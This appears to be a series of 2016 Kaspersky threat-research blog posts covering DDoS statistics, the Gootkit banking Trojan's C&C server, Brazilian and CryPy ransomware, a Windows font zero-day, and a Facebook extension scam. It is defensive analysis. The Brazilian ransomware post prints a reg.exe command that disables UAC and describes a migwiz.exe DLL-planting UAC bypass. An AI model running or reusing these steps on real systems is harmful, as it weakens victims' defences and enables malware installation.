Establishing a secure connection requires considerable resources, despite operating speeds for cryptographic algorithms constantly increasing (e.g., the elliptic curve algorithm has made it possible to enhance the performance of encryption while maintaining the persistence level). For the sake of comparison, a properly configured web server is capable of processing tens of thousands of new HTTP connections per second, but when processing encrypted connections this capacity falls to just hundreds of connections per second.

The use of hardware crypto accelerators makes it possible to significantly increase this value. However, this doesn’t help much considering the current reality of cheap and readily available rented servers, high-capacity communication channels, as well as known vulnerabilities that allow cybercriminals to build larger botnets. They can carry out a successful DDoS attack by creating a load that exceeds the performance of expensive hardware solutions.

A typical example of a “smart” attack is a relatively small number of queries being sent to the “load-heavy” parts of websites (as a rule, search forms are chosen) inside a small number of encrypted connections. Those requests are almost invisible in the overall traffic flow, and at a low intensity they are often very effective. At the same time, decryption and analysis of traffic is only possible on the web-server side.

Encryption also complicates the operation of specialized systems designed to protect against DDoS attacks (especially solutions used by communications providers). Decrypting traffic on-the-fly in order to analyze the content of network packets is often not possible during such attacks due to technical or security reasons (it’s not permitted to pass a server’s private key to third-party organizations, mathematical limitations prevent access to the information in encrypted packets in transit traffic). This significantly reduces the effectiveness of protection against such attacks.

The growing proportion of “smart” DDoS attacks is caused in no small part by the fact that amplification-type attacks, the most popular attack type in recent times, are becoming increasingly difficult to implement. On the Internet, the number of vulnerable servers that can be used to organize such attacks is steadily falling. In addition, most of these attacks have similar features, making it easy to block them completely, and ensuring their effectiveness is eroded over time.

The desire of website owners to protect data and improve privacy levels, combined with cheaper computing capacities have resulted in a growing trend: classic HTTP is being replaced by HTTPS, leading to an increase in the proportion of resources using encryption. The development of web-based technology encourages active implementation of the new HTTP/2 protocol, in which operations without encryption are not supported by the latest browsers.

We believe that the number of encryption-based attacks will grow. For developers of information security solutions this requires an immediate reappraisal of their approach to combating distributed attacks, because today’s tried and tested solutions may soon become ineffective.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.

DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the third quarter of 2016.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q3 Summary
  • Resources in 67 countries (vs. 70 in Q2) were targeted by DDoS attacks in Q3 2016.
  • 62.6% of targeted resources were located in China.
  • China, the US and South Korea remained leaders in terms of both the number of DDoS attacks and number of targets. For the first time both rankings included Italy.
  • The longest DDoS attack in Q3 2016 lasted for 184 hours (or 7.6 days) – significantly shorter than the previous quarter’s maximum (291 hours or 12.1 days).
  • A popular Chinese search engine was subjected to the largest number of attacks (19) over the reporting period.
  • SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method continued to grow, increasing by 5 p.p., while the shares of TCP DDoS and HTTP DDoS continued to decline.
  • In Q3 2016, the percentage of attacks launched from Linux botnets continued to increase and reached 78.9% of all detected attacks.
Geography of attacks

In Q3 2016, the geography of DDoS attacks narrowed to 67 countries, with China accounting for 72.6% (4.8 p.p. less than the previous quarter). In fact, 97.4% of the targeted resources were located in just 10 countries. The other two countries in the top three switched places – the US (12.8%) overtook South Korea (6.3%) to become the second most targeted country.

Distribution of DDoS attacks by country, Q2 2016 vs. Q3 2016

One entry of note to the rating of most targeted countries was Italy, appearing for the first time ever and accounting for 0.6% of all attacks. In all, the TOP 10 included three Western European countries (Italy, France and Germany).

This quarter’s statistics show that targets within the leading 10 countries accounted for 96.9% of all attacks.

Distribution of unique DDoS attack targets by country, Q2 2016 vs. Q3 2016

In Q3 2016, 62.6% of attacks (8.7 p.p. less than the previous quarter) targeted resources located in China. However, targets in the US became more attractive for cybercriminals – the country’s share accounted for 18.7% compared with 8.9% in the previous quarter. South Korea rounded off the top three – its contribution decreased by 2.4 p.p. and amounted to 8.7%.

The shares of the other countries in the TOP 10 increased, with the exception of France (0.4%), which saw a fall of 0.1 p.p. Japan (1.6%) and Italy (1.1%) each saw a 1 p.p. increase, and as a result, Italy entered the TOP 10 for the first time and went straight in at 6th place (Ukraine left the TOP 10). The proportion of attacks targeting Russia also grew significantly – from 0.8% to 1.1%.

This rating also included three Western European countries – Italy, France and the Netherlands.

Changes in DDoS attack numbers

DDoS activity was relatively uneven in Q3 2016. The period between 21 July and 7 August was marked by the highest DDoS activity, with peaks in the number of attacks registered on 23 July and 3 August. From 8 August, DDoS activity plummeted and resulted in a lull which lasted from 14 August till 6 September. The smallest number of attacks was recorded on 3 September (22 attacks). The largest number of attacks was observed on 3 August – 1,746 attacks. Note that this is the highest figure for the first three quarters of 2016. Most of these attacks took place on the servers of just one service provider located in the United States.

Number of DDoS attacks over time* in Q3 2016

*DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.

In Q3, Friday was the most active day of the week for DDoS attacks (17.3% of attacks), followed by Thursday (15.2%). Monday, which was second in Q2 with 15%, became the quietest day of the week in terms of DDoS attacks (12.6%).

Distribution of DDoS attack numbers by day of the week, Q2 and Q3 2016

Types and duration of DDoS attacks

The rating of the most popular attack methods saw no considerable changes from the previous quarter. The SYN DDoS method has further strengthened its position as leader: its share increased from 76% to 81%. The proportion of the other attack types decreased slightly. ICMP DDoS was most affected: its share decreased by 2.6 p.p.

Distribution of DDoS attacks by type, Q2 and Q3 2016

Attacks that last no more than four hours remained the most popular: in Q3 their share increased by 9.2 p.p., accounting for 69%. Attacks that lasted 5-9 hours remained in second. Meanwhile, the percentage of longer attacks decreased considerably – the share of attacks lasting 100-149 hours fell from 1.7% in Q2 to 0.1% in the third quarter. There were very few cases of attacks lasting longer than that.

Distribution of DDoS attacks by duration (hours), Q2 and Q3 2016

The longest DDoS attack in Q3 2016 only lasted for 184 hours (targeting a Chinese provider), which is significantly lower than the Q2 maximum of 291 hours. A Chinese search engine had the unenviable distinction of being attacked most – it was targeted 19 times during the quarter.

C&C servers and botnet types

In Q3, the highest number of C&C servers (45.8%) was detected in South Korea, although this country’s contribution is considerably smaller compared to the previous quarter (69.6%).

The top three countries hosting the most C&C servers remained unchanged – South Korea, China and the US – although their total share was 67.7% vs. 84.8% in Q2.

The number of active C&C servers in Western Europe is growing – the TOP 10 included the Netherlands (4.8%), the UK (4.4%), and France (2%). To recap, three Western European countries entered both the TOP 10 countries subjected to the highest number of attacks and the TOP 10 countries with the highest number of targets.

Among the newcomers to the C&C rating were Hong Kong and Ukraine, each with a share of 2%.

Distribution of botnet C&C servers by country in Q3 2016

In Q3, Linux-based DDoS bots remained the clear leader and the share of attacks launched from Linux botnets continued to grow, accounting for 78.9% vs. 70.8% in Q2. This correlates with the growing popularity of SYN DDoS for which Linux bots are the most appropriate tool. In addition, this can be explained by the growing popularity of Linux-based IoT devices used for DDoS attacks, and will most probably be boosted further after the leakage of Mirai.

Correlation between attacks launched from Windows and Linux botnets, Q2 and Q3 2016

Q3 continues the trend of Linux dominance from the previous quarter. Prior to Q2 2016, the difference between the share of Windows- and Linux-based botnets did not exceed 10 p.p. for several quarters in a row.

The majority of attacks – 99.8% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.2% of cases.

Conclusion

‘Classic’ botnet attacks based on widespread malware tools such as Pandora, Drive, etc. have been well researched by analysts who have developed effective and simple methods of neutralizing attacks that utilize these tools. This is increasingly forcing cybercriminals to use more sophisticated attack methods, including data encryption and new approaches to the development of tools used for organizing attacks and building botnets.

Another interesting trend this quarter was the increased activity of DDoS botnets in Western Europe. For the first time in a year the TOP 10 most attacked countries included three Western European countries – Italy, France and Germany. This correlates with the increased number of active C&C servers in Western Europe, particularly in France, the UK and the Netherlands. Overall, Western European countries accounted for about 13% of active DDoS botnet C&C servers.

Inside the Gootkit C&C server

Thu, 10/27/2016 - 05:25

The Gootkit bot is one of those types of malicious program that rarely attracts much attention from researchers. The reason is its limited propagation and a lack of distinguishing features.

There are some early instances, including on Securelist (here and here), where Gootkit is mentioned in online malware research as a component in bots and Trojans. However, the first detailed analysis was published by researchers around two years ago. That was the first attempt to describe the bot as a standalone malicious program, where it was described as a “new multi-functional backdoor”. The authors of that piece of research put forward the assertion that the bot’s features were borrowed from other Trojans, and also provided a description of some of Gootkit’s key features.

In September 2016, we discovered a new version of Gootkit with a characteristic and instantly recognizable feature: an extra check of the environment variable ‘crackme’ in the downloader’s body. This feature was not present in the early versions. Just as interesting was the fact that we were able to gain access to the bot’s C&C server, including its complete hierarchal tree of folders and files and their contents.

Infection

As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The Trojan’s main propagation methods are spam messages with malicious attachments and websites containing exploits on infected pages (Rig Exploit Kit). The attachment in the spam messages contained Trojan-Banker.Win32.Tuhkit, the small initial downloader that launched and downloaded the main downloader from the C&C server, which in turn downloaded Gootkit.

Examples of infected pages used to spread the Trojan

While carrying out our research we detected a huge number of the initial downloader versions that were used to distribute the Trojan – most of them are detected as Trojan.Win32.Yakes. Some of the loaders were extremely odd, like the one shown below. It clearly stated in its code that is was a loader for Gootkit.

Section of code from one of the initial downloaders

Some versions of Gootkit are also able to launch the main body with administrator privileges bypassing UAC. To do so, the main loader created an SDB file and registered it in the system with the help of the sdbinst.exe utility, after which it launched the bot with elevated privileges without notifying the user.

‘Crackme’ check

The new version of Gootkit is distinct in that it checks the environment variable ‘crackme’ located in the downloader body. It works as follows: the value of the variable is compared to a fixed value. If the two values differ, the bot starts to check if it has been launched in a virtual environment.

Checking the global variable in the downloader’s body

To do so, the bot checks the variable ‘trustedcomp’, just like it did in earlier versions.

Checking the bot’s body for launch in a virtual environment

The Trojan’s main body

The Trojan’s main file includes a NodeJS interpreter and scripts. After unpacking, the scripts look like this:

NodeJS scripts that make up the Trojan’s main body

The scripts shown in the screenshot constitute the main body of the Trojan. Gootkit has about a hundred various scripts, but they are mostly for practical purposes (intermediate data handlers, network communication DLLs, wrapper classes implementations, encoders etc.) and not of much interest.

The Trojan itself is distributed in an encrypted and packed form. Gootkit is encrypted with a simple XOR with a round key; unpacking is performed using standard Windows API tools. The screen below shows the first 255 bytes of the transferred data.

The Trojan’s packed body

The first three DWORDs denote the sizes of the received, unpacked and packed data respectively. One can easily check this by subtracting the third DWORD from the first DWORD, which leaves 12 bytes – i.e., the size of these variables.

Stealing money

Interception of user data is done the standard way, via web injections into HTTPS traffic (examples of these web injects are shown below). After the data is sent to the C&C server, it is processed by parsers, each of which is associated with the website of a specific bank.

Fragment of parser code

Communication with the C&C

In the version of Gootkit under review, the C&C address is the same as the address from which the Trojan’s main body is downloaded; in earlier versions, these two addresses sometimes differed. While generating a request, the Trojan uses its unique User Agent – any request that does not specify a User Agent will be denied.

The unique GootKit User Agent

Communication with the C&C comes down to the exchange of a pre-defined set of commands, the main ones being:

  • Request a list of files available to the Trojan (P_FS:FS_READDIR);
  • Receive those files (P_FS:FS_GETFILE/FS_GET_MULTIPLEFILES);
  • Receive update for the bot (P_FS: FS_GETFILE);
  • Obtain screenshot (P_SPYWARE:SP_SCREENSHOT);
  • Upload list of processes (P_SPYWARE:SP_PROCESSLIST);
  • Terminate process (P_SPYWARE:SP_PROCESSKILL);
  • Download modules (P_FS: FS_GETFILE);
  • Receive web injects (P_ SPYWARE:SP_SPYWARE_CONFIG).

The bot’s main commands and sub-commands

The C&C addresses (two or three in number) are hardwired in the loader’s body and can also be saved in the registry. The body of the data packet may vary depending on the request type, but always includes the following variables:

  • Size of data packet, plus eight;
  • Check value XORed with a constant;
  • Command type;
  • Command sub-type.

In the screen below, the C&C requests registration information from the bot during its first launch.

Request from C&C, example of variables

The response in this case will contain detailed information about the infected computer, including:

  • Network adapter parameters;
  • CPU details, amount of RAM;
  • User name, computer name.

Regardless of the request type, data is communicated between the C&C and the bot in the format protobuf.

When the main body is downloaded, the address that the loader contacts typically ends in one of the following strings:

  • /rbody32;
  • /rbody64;
  • /rbody320.

Mystery solved…rather easily

We found a configuration error that often appears on botnet C&C servers and took advantage of it to capture a complete tree of folders and files, as well as their contents, from one of the GootKit C&C servers.

Contents of GootKit C&C server

The C&C server contains a number of parsers for different banking sites. These parsers are used (provided the user data is available) to steal money from user accounts and to send notifications via Jabber. The stolen data is used in the form of text files, with the infected computer’s IP address used as the file name.

Stolen data and logs on the bot’s C&C server

Example of stolen data in one of the text files

Other data (bank transfers and logs) is also stored in text file format.

Parser logs

An analysis of the bot’s web injects and parser logs has shown that the attackers primarily target the clients of German and French banks.

Distribution of web injects across domain zones

Excerpts from parser logs

Analysis of the server content and the parsers made it clear that the botnet’s creator was a Russian speaker. Note the comments in the screen below.

A fragment of script including the author’s comments in Russian

Moreover, Gootkit most probably has just one owner – it’s not for sale anywhere and, regardless of the downloaders’ modifications or type of admin panel, the code in NodeJS (the Trojan’s main body) is always the same.

Examples of Gootkit web injects

Conclusions

Gootkit belongs to a class of Trojans that are extremely tenacious, albeit not very widespread. Because it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.

It should also be noted that the users of NodeJS as a development platform set themselves certain limitations, but simultaneously get a substantial degree of flexibility and simplicity when creating new versions of the Trojan.

Kaspersky Lab’s security products detect the Trojan GootKit and all its associated components under the following verdicts:

  • Trojan-Banker.Win32.Tuhkit (the initial downloader distributed via emails);
  • Trojan.Win32.Yakes (some modifications of the main downloader);
  • HEUR:Trojan.Win32.Generic (the bot’s main body, some modifications of the downloader).
MD5

1c89a85c1a268f6abb34fb857f5b1b6f
7521e82162ed175ad68582dd233ab1ae
9339dcb3571dda122b71fb80de55d0d6
b13378ad831a1e4e60536b6a3d155c42
9ba9f48cda9db950feb4fbe10f61353c

The “notification” ransomware lands in Brazil

Tue, 10/25/2016 - 03:57

It’s unusual for a day to go by without finding some new variant of a known ransomware, or, what is even more interesting, a completely new one. Unlike the previously reported and now decrypted Xpan ransomware, this same-but-different threat from Brazil has recently been spotted in the wild. This time the infection vector is not a targeted remote desktop intrusion, but a more massively propagated malicious campaign relying on traditional spam email.

Since the infection is not done manually by the bad guys, their malware has a higher chance of being detected and we believe that is one of the reasons for them to have added one more level of protection to the code, resorting to a binary dropper to launch the malicious payload.

Given that this particular ransomware is fairly well known by now, instead of opting for the usual branding and marketing efforts in which most ransomware authors invest time, this group has decided to choose an unnamed campaign, showing only an email address for technical support and a bitcoin address for making the payment. It has become a kind of urban legend that if you can’t find something on Google, then it doesn’t exist.

Not very long ago, we saw the birth of truly autochthonous Brazilian ransomware, without much technical sophistication and mainly based on an open-source project. While there’s a long road ahead for local bad guys to achieve the level of the key players on the ransomware scene, this particular family is interesting to study since there have been versions in English, Italian, and now Brazilian Portuguese. Is this ransomware being sold as a commodity in underground forums with Brazilian crews just standing on the shoulders of giants? Or is this a regional operation just starting out?

As one of the very few ransomware variants that prepend a custom ‘Lock.’ extension to the encrypted files instead of appending it, the task of recognizing this malware is not particularly difficult. However, understanding its true origins could still be considered an ongoing debate.

The drop

If we trust that the first transaction corresponds to the very first victim, the campaign has probably been active since 2016-04-04 17:29:26 (April 4th, 2016). In reality, this is not exactly accurate. The timestamp of the original dropper shows that the sample was actually compiled at the beginning of October:

That would mean that the criminal behind the campaign might have had different ransomware campaigns running in the past, or is just using the same BTC wallet for more than his criminal deeds.

The dropper is protected by the popular .NET obfuscator SmartAssembly, as can be seen by the string “Powered by SmartAssembly 6.9.0.114”. Once executed, it tries to mask itself in the Alternate Data Stream of the NTFS file system in Windows:

“%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Sims.exe:Zone.Identifier

It’s capable of disabling Windows LUA protection:

“HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM”; Key: “ENABLELUA”; Value: “00000000”
(cmd.exe /c %WINDIR%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f)

The mechanism used to write new information to the registry is quite unusual: it uses the official windows application ‘migwiz.exe’ in order to bypass the UAC screen, not requiring any action from the user to execute with elevated privileges.

The malware is able to do that by writing a library ‘cryptbase.dll’ to the same folder as the ‘migwiz.exe’ file. Then, as soon as it’s launched, the process will load this library, which has a WinExec call that will launch the command line provided by the parameter.

The reason why they are using MigWiz is because this process is one that is in Microsoft’s auto-elevate list, meaning it can be elevated without asking for explicit permission.

As a simple mean of information gathering, the dropper will read the name of the infected computer:

HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME”; Key: “COMPUTERNAME

Moreover, it includes data stealer techniques, such as retrieving information from the clipboard, or while it’s being typed on the keyboard. Additionally it has the capability to reboot the user’s machine.

@4333be: push ebp
@4333bf: mov ebp, esp
@4333c1: sub esp, 14h
@4333c4: push ebx
@4333c5: mov ebx, dword ptr [ebp+08h]@4333c8: lea eax, dword ptr [ebp-04h]@4333cb: push eax
@4333cc: push 00000028h
@4333ce: call dword ptr [00482310h] ;GetCurrentProcess@KERNEL32.DLL
@4333d4: push eax
@4333d5: call dword ptr [0048202Ch] ;OpenProcessToken@ADVAPI32.DLL
@4333db: test eax, eax
@4333dd: je 0043341Eh
@4333df: lea ecx, dword ptr [ebp-10h]@4333e2: push ecx
@4333e3: push 00487D68h ;SeShutdownPrivilege

Finally, it drops and executes the file tmp.exe (corresponding hash B4FDC93E0C089F6B885FFC13024E4B9).

Hello sir, hello madam, your fines have been locked

After the infection has been completed, as is usual in all ransomware families, the ransom note is shown. This time, it is written in Brazilian Portuguese and demanding 2000 BRL, which equates to around 627 USD or 1 BTC at the time of writing.

The bitcoin address provided (1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4) for payment shows total deposits for 1.89 BTC although many transactions have been made since the creation of this wallet. This is leading us to believe that either the criminal has been using the wallet for other purposes or they have bargaining with the victims and offering them a lower price, as depicted by the amount in each transaction.

The ransom note is very succinct, without giving any special payment URL or any other type of information. The victim will have to learn about bitcoin payments the hard way, and should they need support they can reach the criminals through a single email point of contact.

AVISO
Ola Sr(a),
TODOS os seus arquivos foram BLOQUEADOS e esse bloqueio somente serão DESBLOQUEADOS
caso pague um valor em R$ 2000,00 (dois Mil reais) em Bitcoins
Após o pagamento desse valor, basta me enviar um print para o email
infomacaoh@gmail.com
que estarei lhe enviando o programa com a senha para descriptografar/desbloquear o seus arquivos.
Caso o pagamento não seja efetuado, todos os seus dados serão bloqueados
permanentemente e o seu computador sera totalmente formatado
(Perdendo assim, todas as informações contidas nele, incluindo senhas de email, bancárias…)
O pagamento deverá ser efetuado nesse endereço de Bitcoin:
1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4
Para converter seu saldo em bitcoins acesse o site:
https://www.mercadobitcoin.com.br/conta/register/

Growth of ransomware in Brazil

The growth of ransomware in Brazil has been nothing short of impressive, taking into consideration that during October 2016 alone the popular ransomware family Trojan-Ransom.NSIS.MyxaHaTpyne.gen family grew by 287.96%, and another of the usual suspects Trojan-Ransom.Win32.CryptXXX.gen grew by 56.96%, (when compared to the previous month in each case.)

In 2016, the 3 most important families of ransomware have been Trojan-Ransom.Win32.Blocker, accounting for 49.63% of the total infections,

Trojan-Ransom.NSIS.Onion, 29.09%, and Trojan-Ransom.Win32.Locky, 3.99%.

Currently, Brazil is the eighth most affected country worldwide as far as ransomware infections go for this year, and ranked first in Latin America.

Indicators of compromise

File: 04.exe
Size: 1049600
MD5: 86C85BD08DFAC63DF65EAEAE82ED14F7
Compiled: Saturday, October 8 2016, 11:22:30 – 32 Bit .NET

File: tmp.exe
Size: 842220
MD5: BB4FDC93E0C089F6B885FFC13024E4B9
Compiled: Sunday, January 29 2012, 21:32:28 – 32 Bit

Windows zero-day exploit used in targeted attacks by FruityArmor APT

Thu, 10/20/2016 - 04:56

A few days ago, Microsoft published the “critical” MS16-120 security bulletin with fixes for vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync.

One of the vulnerabilities – CVE-2016-3393 – was reported to Microsoft by Kaspersky Lab in September 2016.

Here’s a bit of background on how this zero-day was discovered. A few of months ago, we deployed a new set of technologies in our products to identify and block zero-day attacks. These technologies proved their effectiveness earlier this year, when we discovered two Adobe Flash zero-day exploits – CVE-2016-1010 and CVE-2016-4171. Two Windows EoP exploits have also been found with the help of this technology. One is CVE-2016-0165. The other is CVE-2016-3393.

Like most zero-day exploits found in the wild today, CVE-2016-3393 is used by an APT group we call FruityArmor. FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.

In this report we describe the vulnerability that was used by this group to elevate privileges on a victim’s machine. Please keep in mind that we will not be publishing all the details about this vulnerability because of the risk that other threat actors may use them in their attacks.

Attack chain description

To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine. Most of the recent attacks we’ve seen that rely on a browser exploit are combined with an EoP exploit, which allows for a reliable sandbox escape.

In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.

EOP zero-day details

The vulnerability is located in the cjComputeGLYPHSET_MSFT_GENERAL function from the Win32k.sys system module. This function parses the cmap table and fills internal structures. The CMAP structure looks like this:

The most interesting parts of this structure are two arrays – endCount and startCount. The exploit contains the next cmap table with segments:

To compute how much memory to allocate to internal structures, the function executes this code:

After computing this number, the function allocates memory for structures in the following way:

The problem is that if we compute the entire table, we will achieve an integer overflow and the cnt variable will contain an incorrect value.

In kernel, we see the following picture:

The code allocates memory only for 0x18 InternalStruct but then there is a loop for all the segments range (this value was extracted from the file directly):

Using the cmap table, the v44 variable (index) could be controlled and, as a result, we get memory corruption. To achieve it, the attacker can do the following:

  1. Make an integer overflow in win32k!cjComputeGLYPHSET_MSFT_GENERAL
  2. Make a specific segment ranges in font file to access interesting memory.

What about Windows 10? As most of you know, the font processing in Windows 10 is performed in a special user mode process with restricted privileges. This is a very good solution but the code has the same bug in the TTF processing.

As a result, if you load/open this font exploit in Windows 10, you will see the crash of fontdrvhost.exe:

Kaspersky Lab detects this exploit as:

  • HEUR:Exploit.Win32.Generic
  • PDM:Exploit.Win32.Generic

We would like to thank Microsoft for their swift response in closing this security hole.

* More information about the FruityArmor APT group is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com

‘Adult’ video for Facebook users

Mon, 10/17/2016 - 04:57

In April of this year, we registered some mass attacks on Facebook users in Russia. As a result, many Russian-speaking users of the social network fell victim to fraudsters. Half a year later the fraudsters have used the same tactics to attack Facebook users in Europe.

The attackers use a compromised Facebook account to post a link to an adult video that is supposedly on the popular YouTube service. In order to attract potential victims, “likes” are added from the account holder’s list of friends. The fraudsters rely on the user or their friends being curious and those who would like to watch an “18+” video.

Clicking on the link opens a page made to look like YouTube.

However, a quick look at the address bar is enough to see that the page has nothing to do with YouTube. During the latest attack the fraudsters distributed a “video” located on the xic.graphics domain. The domain is not currently available, but we discovered more than 140 domains with the same registration data that can be used for similar purposes.
After trying to start the video, a pop-up banner appears prompting the user to install a browser extension. In this particular example, it was called ‘Profesjonalny Asystent’ (Professional assistant), but we also came across other names.

The “View details” message explains that if the extension is not installed, the video cannot be viewed.

The attackers are banking on an intrigued victim not being interested in the details and just installing the extension. As a result, the extension gains rights to read all the data in the browser, which the fraudsters can later use to get all the passwords, logins, credit card details and other confidential user information that is entered. The extension can also continue spreading links to itself on Facebook, but now in your name and among your friends.

We strongly recommend not clicking such links and not installing suspicious browser extensions. It’s also worth checking if any suspicious extensions have already been installed. If any are discovered, they should be immediately removed via the browser settings, and the passwords for sites that are visited most often, especially online banking, should be changed.

CryPy: ransomware behind Israeli lines

Thu, 10/13/2016 - 05:26

A Tweet posted recently by AVG researcher, Jakub Kroustek, suggested that a new ransomware, written entirely in Python, had been found in the wild, joining the emerging trend for Pysomwares such as the latest HolyCrypt, Fs0ciety Locker and others.

This Python executable comprises two main files. One is called boot_common.py and the other encryptor.py. The first is responsible for error-logging on Windows platforms, while the second, the encryptor, is the actual locker. Within the encryptor are a number of functions including two calls to the C&C server. The C&C is hidden behind a compromised web server located in Israel. The Israeli server was compromised using a known vulnerability in a content management system called Magento, which allowed the threat actors to upload a PHP shell script as well as additional files that assist them in streaming data from the ransomware to the C&C and back.

A notable point to mention is that the server was also used for phishing attacks, and contained Paypal phishing pages. There are strong indications that a Hebrew-speaking threat actor was behind these phishing attacks. The stolen Paypal credentials were forwarded to another remote server located in Mexico and which contains the same arbitrary file upload technique, only with a different content management.

It is a known practice for attackers to look for low-hanging fruit into which they can inject their code in order to hide their C&C server. One such example was the CTB-Locker for web servers reported last March.

Ransomware Analysis

ICON:

SHA1: ad046bfa111a493619ca404909ef82cb0107f012
MD5: 8bd7cd1eee4594ad4886ac3f1a05273b
Size: 5.22 MB
Type: exe

To reverse the executable one should first conduct a number of checks using a convenient debugger. The universal steps for unpacking an unknown packer start with trying to set a memory breakpoint on popular functions that packers use, such as VirtualAlloc.

If the breakpoint hits, the next step involves switching to user mode and setting a hardware breakpoint (on access). That will assist in inspecting where exactly the program initializes the memory block. In most cases, an executable magic header (MZ) should appear in the memory block. However, in this case the following screenshot shows the readable data that was allocated to that memory block:

After the data was allocated to the memory block, it appeared to be using VM code (python vm) to execute the code. For those who are not familiar with the term, VM code is the process of creating new instruction sets based on the author’s request. The CPU uses those instruction sets to understand the instructions.

py2exe simply converts the code to x86 assembly, the architecture used on the CPU for communication, and, by loading a python DLLs, loads all the modules into the memory.

We found that the executable file was generated using py2exe. The first indicator was a stack PUSH instruction to add the string – PY2EXE_VERBOSE: a module that compiles Python scripts to Microsoft Windows executables.

PY2EXE module string disclosure

A module that reverse the operation of the py2exe can be found in Github and is called unpy2exe. This module will revert the executable back to its origin Python compiled code (i.e. .pyc file). From that format, another step will be required to fully revert to the original code. We randomly chose to use EasyPythonDecompiler.

Fully decompiled Python scripts

In it’s current state, the executable fails to encrypt the file system, simply because the threat actors must have migrated from the current server to another. By doing so, they deleted the remaining traces of the PHP files they used for data collection from a victim’s machine. The following is the log file that is generated upon exception:

Error log file being generated by the boot_common.py

The scripts in Python use two files:

  • Name: boot_common.py
    md5: dfd6237e26babdbc2b32fa0d625c2d16
    SHA1: 38fe7b64113e467375202e2708199b45a22b25a6
    Size: 3Kb
    This file throws an “error” to show that the program failed to execute if there is a problem.
  • Name: encryptor.py
    md5: 1ed3f127a0e94394ef049965bbc952ef
    SHA1: 73122712b4563fadcc9871eb3fe0efdcf70bb608
    Size: 9Kb
    This script encrypts the victim’s files.

The ransomware disables the following features from the compromised machine:
By overwriting the registry policies it disables Registry Tools, Task Manager, CMD and Run.

list of registry manipulations

It then continues with changing bcdedit to disable recovery and ignore boot status policy.

Upon successful encryption, the ransomware will encrypt the following file extensions:
*.mid, *.wma, *.flv, *.mkv, *.mov, *.avi, *.asf, *.mpeg, *.vob, *.mpg, *.wmv, *.fla, *.swf, *.wav, *.qcow2, *.vdi, *.vmdk, *.vmx, *.gpg, *.aes, *.ARC, *.PAQ, *.tar.bz2, *.tbk, *.bak, *.tar, *.tgz, *.rar, *.zip, *.djv, *.djvu, *.svg, *.bmp, *.png, *.gif, *.raw, *.cgm, *.jpeg, *.jpg, *.tif, *.tiff, *.NEF, *.psd, *.cmd, *.class, *.jar, *.java, *.asp, *.brd, *.sch, *.dch, *.dip, *.vbs, *.asm, *.pas, *.cpp, *.php, *.ldf, *.mdf, *.ibd, *.MYI, *.MYD, *.frm, *.odb, *.dbf, *.mdb, *.sql, *.SQLITEDB, *.SQLITE3, *.asc, *.lay6, *.lay, *.ms11 (Security copy), *.sldm, *.sldx, *.ppsm, *.ppsx, *.ppam, *.docb, *.mml, *.sxm, *.otg, *.odg, *.uop, *.potx, *.potm, *.pptx, *.pptm, *.std, *.sxd, *.pot, *.pps, *.sti, *.sxi, *.otp, *.odp, *.wks, *.xltx, *.xltm, *.xlsx, *.xlsm, *.xlsb, *.slk, *.xlw, *.xlt, *.xlm, *.xlc, *.dif, *.stc, *.sxc, *.ots, *.ods, *.hwp, *.dotm, *.dotx, *.docm, *.docx, *.DOT, *.max, *.xml, *.txt, *.CSV, *.uot, *.RTF, *.pdf, *.XLS, *.PPT, *.stw, *.sxw, *.ott, *.odt, *.DOC, *.pem, *.csr, *.crt, *.key and wallet.dat to encrypt crypto currency wallets

The files are encrypted using AES with CBC mode for the following paths:

D:\\
E:\\
[userhome]\\contacts
[userhome]\\Documents\\
[userhome]\\Downloads\\
[userhome]\\Favorites\\
[userhome]\\Links\\
